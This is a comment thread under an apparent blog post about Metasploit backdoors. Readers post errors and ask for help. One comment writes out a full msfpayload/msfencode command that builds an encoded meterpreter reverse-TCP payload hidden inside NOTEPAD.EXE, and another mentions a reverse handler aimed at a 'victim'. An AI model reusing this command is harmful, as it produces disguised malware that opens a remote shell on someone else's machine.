    Vishnu, I would like you to please help me out in regard to the problem I posted in my earlier post. Your help will be highly appreciated.

  • Abhijith

    Nice blog post, but now this backdoor is detected ;[.

    I found another video about backdoors; hope you like it. There are lots of videos, but I am only interested in creating backdoors. Have a look if you like this video: http://goo.gl/XlwJX

    • v4L

      #Abhijith
      Thanks for sharing 🙂

  • umesh

    When I run exploit for the payload, the message shows like this:

    exploit
    started reverse handler ip:lport
    started payload handler
    killed

    After this "killed" message my process stops.
    Is this a problem with the network connection?
    Is this a problem with the firewall being on?

    But it should be noted that my network and the victim's network are OK and my firewall is off.
    If there is any other suggestion then please give it to me, thank u

  • Bob Mansfield

    Hello, I am getting this error. Could you please help, as it would be much appreciated.

    Thank You

    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.254 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -x /root/Desktop/NOTEPAD.EXE -o /root/Desktop/NOTEPAD2.EXE
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    [*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
    [*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
    [-] x86/shikata_ga_nai failed: Offset 0 outside of image source
    [-] No encoders succeeded.

  • Sir, I have got some problem:
    can you please help me to solve it:
    "I have been using BackTrack as my primary OS for my security programming. Right now I am stuck: although I have been able to find back doors in "IBL's" security, I haven't been able to crack the cause of this problem; the "coroma sub-6" hasn't been much use. Could you recommend a program for a better source rendering?"

    • v4L

      #icarus

      I don't understand your question??

  • Fulano

    When I try to encode with a calc.exe or a notepad.exe I always receive this message: "[-] x86/shikata_ga_nai failed: index 193536 out of string"

    Any idea what it can be?

  • ahsan tahir

    Sir, please tell me, when I write this /root/notpad.exe>
    it shows this message <>
    and also I am using Kali Linux 2.0.
    Thanks, please reply to me as soon as possible.

  • Bob

    I have a question: my IP address is 192.168.1.13.

    What if there is another one with my IP? How will this test work on the global network?
    Help ??????????